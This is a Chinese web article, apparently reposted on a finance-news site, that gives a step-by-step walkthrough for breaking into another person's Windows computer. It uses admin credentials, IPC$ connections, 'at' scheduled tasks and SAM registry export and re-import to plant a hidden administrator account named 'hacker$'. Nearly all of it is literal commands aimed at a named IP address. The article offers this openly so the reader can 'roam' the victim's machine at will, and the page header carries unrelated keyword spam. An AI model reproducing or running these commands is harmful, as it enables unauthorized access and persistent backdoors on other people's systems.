洛阳新闻,党建新农村建设,蔷靖潞影,杨雨婷 张书记
 
位置: 亚洲金融智库网 > 网络安全 > 正文

怎么攻击一个网站或IP?

时间:2022-04-09 16:48
本文关于怎么攻击一个网站或IP?,据亚洲金融智库2022-04-09日讯:

我可以告诉你一个办法不过需要对象的用户名和口令(如果是个电脑白痴的话,你都不需要知道他用户名和口令,通常都是administrator密码是没有),还有他的IP 地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。


在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。


对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。


1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)


2.先与他建立连接:


net use \\13.50.97.238\ipc$ 12345678 /user:Administrator”


3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):


at \\13.50.97.238 12:51 c:\windows\system32\net.exe user hacker$ 1234 /add


建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。


4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:


at \\13.50.97.238 12:55 c:\windows\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users


/e 是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将c:\windows\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users引起来。


5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:


Copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg


6.再将编辑好的hacker.reg拷回他的电脑上


copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg


7.查看他的电脑时间:net time \\13.50.97.238然后用at命令将用户hacker$删除:


at \\13.50.97.238 13:40 net user hacker$ /del


8.验证hacker$是否删除:net use \\13.50.97.238 /del 断开与他的电脑连接。


再用net use \\13.50.97.238\ipc$ 1234 /user:hacker$ 用帐户hacker$与他电脑连接,不能连接说明已删除。


9.再与他电脑建立连接:


net use \\13.50.97.238\ipc$ 12345678 /user:administrator


再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:


at \\13.50.97.238 13:41 c:\windows\regedit.exe /s hacker1.reg


regedit.exe的参数/s是指安静模式。


10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。


11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。


12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。


OK 以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~


专题推荐:攻击(86)怎么(463)一个(36)
打印此文】 【关闭窗口】【返回顶部
攻击(86)怎么(463)一个(36)相关文章
推荐文章
最新图文


亚洲金融智库网 备案号: 滇ICP备2021006107号-276 版权所有:蓁成科技(云南)有限公司

网站地图本网站文章仅供交流学习,不作为商用,版权归属原作者,部分文章推送时未能及时与原作者取得联系,若来源标注错误或侵犯到您的权益烦请告知,我们将立即删除。